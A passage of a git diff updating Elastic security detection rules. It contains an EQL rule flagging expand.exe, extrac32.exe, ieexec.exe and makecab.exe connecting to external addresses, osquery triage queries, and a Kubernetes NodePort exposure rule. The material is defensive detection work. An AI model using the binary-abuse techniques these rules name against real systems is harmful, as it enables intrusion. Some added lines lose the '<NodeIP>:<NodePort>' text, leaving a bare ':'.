using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json index 6d8ecc056a5..4454d162854 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json index 8350086c23b..3d750287548 100644 --- a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json +++ b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json index eb8d07a8e89..eda1a432be6 100644 --- a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json +++ b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_103.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json index 3ace9d34522..c23f3044be1 100644 --- a/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json +++ b/packages/security_detection_engine/kibana/security_rule/647fc812-7996-4795-8869-9c4ea595fe88_104.json @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json index 0bbaf878a30..c9db28f2bfc 100644 --- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json index 2d24afc4de2..81452a752e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json index bd69ba7789a..37f7477166b 100644 --- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json index 6142f358802..0cb4447f1d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json index 32dd2ce0cb2..4d379cfb64d 100644 --- a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json index b37c69a386a..928a826f742 100644 --- a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json index 548359d1e91..646cfe9f9ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json index 3343f889fd0..a9e335a1362 100644 --- a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json +++ b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_201.json @@ -5,7 +5,7 @@ ], "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", "false_positives": [ - "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting \u003cNodeIP\u003e:\u003cNodePort\u003e. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." ], "index": [ "logs-kubernetes.*" @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json index aa270c71233..7efc108117b 100644 --- a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json +++ b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_202.json @@ -5,7 +5,7 @@ ], "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", "false_positives": [ - "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting \u003cNodeIP\u003e:\u003cNodePort\u003e. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." ], "index": [ "logs-kubernetes.*" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_203.json b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_203.json new file mode 100644 index 00000000000..a26e5ca6752 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/65f9bccd-510b-40df-8263-334f03174fed_203.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", + "false_positives": [ + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Exposed Service Created With Type NodePort", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"services\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.type:\"NodePort\"\n", + "references": [ + "https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types", + "https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport", + "https://www.tigera.io/blog/new-vulnerability-exposes-kubernetes-to-man-in-the-middle-attacks-heres-how-to-mitigate/" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "65f9bccd-510b-40df-8263-334f03174fed", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1133", + "name": "External Remote Services", + "reference": "https://attack.mitre.org/techniques/T1133/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "65f9bccd-510b-40df-8263-334f03174fed_203", + "type": "security-rule" +} \ No newline at end of file diff --git 